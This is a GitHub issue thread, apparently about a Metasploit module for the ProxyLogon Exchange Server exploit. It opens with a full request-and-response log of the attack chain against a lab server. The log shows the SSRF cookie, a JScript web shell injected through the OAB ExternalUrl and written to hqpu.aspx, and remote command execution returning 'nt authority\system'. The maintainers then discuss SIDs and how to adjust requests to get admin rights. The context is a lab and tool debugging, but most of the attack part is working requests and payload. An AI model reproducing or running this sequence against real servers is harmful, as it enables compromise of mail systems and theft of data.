X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 0


####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.&a=~2042160395; ASP.NET_SessionId=add16fb3-f7c7-4aa8-a2de-63bc2199acdb; msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.;
msExchLogonMailbox: S-1-5-21-3876225949-3666446388-246247518-500
msExchTargetMailbox: S-1-5-21-3876225949-3666446388-246247518-500
Content-Type: application/json; charset=utf-8
Content-Length: 159

{"filter":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","SelectedView":"","SelectedVDirType":"OAB"}},"sort":{}}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
request-id: 959d70bd-14f8-44a5-8d44-8a536932c6e2
Set-Cookie: ClientId=FNEC0HZ0YDVRGGA; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab
X-Content-Type-Options: nosniff
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:49 GMT
Content-Length: 590

{"d":{"__type":"JsonDictionaryOfanyTypeResults:ECP","Cmdlets":["Get-OabVirtualDirectory"],"ErrorRecords":[],"Informations":[],"IsDDIEnabled":false,"Warnings":[],"Output":[{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","Name":"OAB (Default Web Site)","Server":"LAB-AD01","AdminDisplayName":"","WhenChanged":"26\/03\/2021 16:26","Identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"5f342854-3a90-4f76-a960-2fd59761e912"},"MajorVersion":15,"Version":"Version 15.0 (Build 1497.2)","Version_s":1941997017,"VDirType":"OAB"}]}}
[*] ASP.NET_SessionId: add16fb3-f7c7-4aa8-a2de-63bc2199acdb
[*] msExchEcpCanary: cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.
[*] OAB id: 5f342854-3a90-4f76-a960-2fd59761e912 (OAB (Default Web Site))
[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-27065
[*] Prepare the payload on the remote target
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.&a=~2059077475; ASP.NET_SessionId=add16fb3-f7c7-4aa8-a2de-63bc2199acdb; msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.;
msExchLogonMailbox: S-1-5-21-3876225949-3666446388-246247518-500
msExchTargetMailbox: S-1-5-21-3876225949-3666446388-246247518-500
Content-Type: application/json; charset=utf-8
Content-Length: 400

{"identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"5f342854-3a90-4f76-a960-2fd59761e912"},"properties":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","ExternalUrl":"http://o/#\u003cscript language=\"JScript\" runat=\"server\"\u003efunction Page_Load(){eval(Request[\"kEEppo\"],\"unsafe\");}\u003c/script\u003e"}}}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
request-id: 831f1d45-6c59-4ae5-b380-f98cbdbec9a8
Set-Cookie: ClientId=IJCCXMCKAVMAAXZDCZG; expires=Sat, 26-Mar-2022 17:30:50 GMT; path=/; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab
X-Content-Type-Options: nosniff
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:52 GMT
Content-Length: 716

{"d":{"__type":"JsonDictionaryOfanyTypeResults:ECP","Cmdlets":["Set-OabVirtualDirectory","Get-OabVirtualDirectory"],"ErrorRecords":[],"Informations":[],"IsDDIEnabled":false,"Warnings":[],"NoAccessProperties":[],"Output":[{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","Server":"LAB-AD01","WhenChanged":"26\/03\/2021 21:30","Identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"5f342854-3a90-4f76-a960-2fd59761e912"},"Name":"OAB (Default Web Site)","Version":"Version 15.0 (Build 1497.2)","VDirType":"OAB"}],"ReadOnlyProperties":[],"Validators":{"__type":"JsonDictionaryOfArrayOfValidatorInfoQ5wmCri2:#Microsoft.Exchange.Management.ControlPanel"}}}
[*] Write the payload on the remote target
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.&a=~2083327634; ASP.NET_SessionId=add16fb3-f7c7-4aa8-a2de-63bc2199acdb; msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.;
msExchLogonMailbox: S-1-5-21-3876225949-3666446388-246247518-500
msExchTargetMailbox: S-1-5-21-3876225949-3666446388-246247518-500
Content-Type: application/json; charset=utf-8
Content-Length: 365

{"identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"5f342854-3a90-4f76-a960-2fd59761e912"},"properties":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","FilePathName":"\\\\127.0.0.1\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\hqpu.aspx"}}}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
request-id: a781c201-e641-44ab-98e7-5d439e8443fe
Set-Cookie: ClientId=FULRWTG0WTBFBSLVBNQ; expires=Sat, 26-Mar-2022 17:30:52 GMT; path=/; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab
X-Content-Type-Options: nosniff
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:52 GMT
Content-Length: 201

{"d":{"__type":"JsonDictionaryOfanyTypeResults:ECP","Cmdlets":[],"ErrorRecords":[],"Informations":[],"IsDDIEnabled":false,"ProgressId":"39b2e43a-634b-44ec-b217-8d1a96586c93","Warnings":[],"Output":[]}}
####################
# Request:
####################
GET /owa/auth/hqpu.aspx HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0


####################
# Response:
####################
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /owa/auth/errorFE.aspx?httpCode=404
Server: Microsoft-IIS/8.5
request-id: 55ba7d22-38d9-4ecf-98e3-5de5d582852d
Set-Cookie: ClientId=UETG9IICUUDSYPSKQ; expires=Sat, 26-Mar-2022 17:30:52 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 17:30:52 GMT
Content-Length: 152

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/owa/auth/errorFE.aspx?httpCode=404">here</a>.</h2>
</body></html>

[!] Wait a lot (0)
####################
# Request:
####################
GET /owa/auth/hqpu.aspx HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
request-id: 0b7df229-c91e-4794-b90f-a94c6eca7eeb
Set-Cookie: ClientId=YFSSUTHREJZITCHJKW; expires=Sat, 26-Mar-2022 17:30:59 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 17:30:59 GMT
Content-Length: 2080

Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             : 
RequireSSL                      : True
BasicAuthentication             : False
WindowsAuthentication           : True
OAuthAuthentication             : False
MetabasePath                    : IIS://LAB-AD01.pwned.lab/W3SVC/1/ROOT/OAB
Path                            : C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         : 
ExtendedProtectionSPNList       : 
AdminDisplayVersion             : Version 15.0 (Build 1497.2)
Server                          : LAB-AD01
InternalUrl                     : https://lab-ad01.pwned.lab/OAB
InternalAuthenticationMethods   : WindowsIntegrated
ExternalUrl                     : http://o/#
ExternalAuthenticationMethods   : WindowsIntegrated
AdminDisplayName                : 
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName               : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=LAB-AD01,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=Pwned Lab2k13,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=pwned,DC=lab
Identity                        : LAB-AD01\OAB (Default Web Site)
Guid                            : 5f342854-3a90-4f76-a960-2fd59761e912
ObjectCategory                  : pwned.lab/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                  msExchVirtualDirectory
                                  msExchOABVirtualDirectory
WhenChanged                     : 26/03/2021 21:30:50
WhenCreated                     : 26/03/2021 16:26:12
WhenChangedUTC                  : 26/03/2021 17:30:50
WhenCreatedUTC                  : 26/03/2021 12:26:12
OrganizationId                  : 
Id                              : LAB-AD01\OAB (Default Web Site)
OriginatingServer               : LAB-AD01.pwned.lab
IsValid                         : True


[+] Yeeting cmd/windows/generic payload at 172.20.2.110:443
####################
# Request:
####################
POST /owa/auth/hqpu.aspx HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

kEEppo=Response.Write(new ActiveXObject("WScript.Shell").Exec("cmd /c whoami").StdOut.ReadAll());
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
request-id: 6d075f44-9279-4340-8428-cf034c3044b4
Set-Cookie: ClientId=PKMFHFTIKOIGGQVWBZXA; expires=Sat, 26-Mar-2022 17:30:59 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 17:30:59 GMT
Content-Length: 2101

nt authority\system
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             : 
RequireSSL                      : True
BasicAuthentication             : False
WindowsAuthentication           : True
OAuthAuthentication             : False
MetabasePath                    : IIS://LAB-AD01.pwned.lab/W3SVC/1/ROOT/OAB
Path                            : C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         : 
ExtendedProtectionSPNList       : 
AdminDisplayVersion             : Version 15.0 (Build 1497.2)
Server                          : LAB-AD01
InternalUrl                     : https://lab-ad01.pwned.lab/OAB
InternalAuthenticationMethods   : WindowsIntegrated
ExternalUrl                     : http://o/#
ExternalAuthenticationMethods   : WindowsIntegrated
AdminDisplayName                : 
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName               : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=LAB-AD01,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=Pwned Lab2k13,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=pwned,DC=lab
Identity                        : LAB-AD01\OAB (Default Web Site)
Guid                            : 5f342854-3a90-4f76-a960-2fd59761e912
ObjectCategory                  : pwned.lab/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                  msExchVirtualDirectory
                                  msExchOABVirtualDirectory
WhenChanged                     : 26/03/2021 21:30:50
WhenCreated                     : 26/03/2021 16:26:12
WhenChangedUTC                  : 26/03/2021 17:30:50
WhenCreatedUTC                  : 26/03/2021 12:26:12
OrganizationId                  : 
Id                              : LAB-AD01\OAB (Default Web Site)
OriginatingServer               : LAB-AD01.pwned.lab
IsValid                         : True


[!] Dumping command output in response
nt authority\system

[!] This exploit may require manual cleanup of 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\hqpu.aspx' on the target

@mekhalleh
Copy link
Owner

The response for POST /ecp/Lf.js HTTP/1.1 ( the one with the <AcceptableResponseSchema>)comes with a parameter in the header: Set-Cookie: X-BackEndCookie=S-1-5-18 ... which I've read it's local admin.

After the second POST /ecp/Lf.js HTTP/1.1 with the LegacyDN this time, the response comes with:

Microsoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '[LegacyDN]' with SID S-1-5-21-.... and MasterAccountSid (StoreError=LoginPerm)

SID S-1-5-21 is for Domain Admin
And I think that's the problem, the cookies should be set to S-1-5-21?

https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/security-identifiers-in-windows

SID Name Description
S-1-5-18 Local System A service account that is used by the operating system.
-- -- --
S-1-5-20 NT Authority Network Service
-- -- --
S-1-5-21domain-500 Administrator A user account for the system administrator. By default, it's the only user account that is given full control over the system.
-- -- --

The domain SID ending to 500 (and it has this shape S-1-5-21-3876225949-3666446388-246247518-500). i dont think you can just use S-1-5-21.

SID S-1-5-18 is not cause of the issue because it seems normal to me to find it in the answers. The service run as local system account...

On the other hand, instead of the domain SID you can normally use this one S-1-5-20. But it's more interesting to have something variable for the detection probes, that's why we patched the user's SID rather than using S-1-5-20.

Did you test the praetorian poc (https://github.com/praetorian-inc/proxylogon-exploit)? does this work for you? If so I would make adjustments.

@mekhalleh
Copy link
Owner

Rapi7 confirms that the module works with the last changes (rapid7/metasploit-framework#14945).

see. rapid7/metasploit-framework#14945 (comment)

But again, some instance of Microsoft Exchange needs more investigation. Basically the code base remains the same but you need to play with the requests to get the admin rights.

You need to look around the request to proxyLogon.ecp and the next one that gets the OAB Id. If this works the rest will work.

Everything goes in the search_oab function.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@mekhalleh @shodano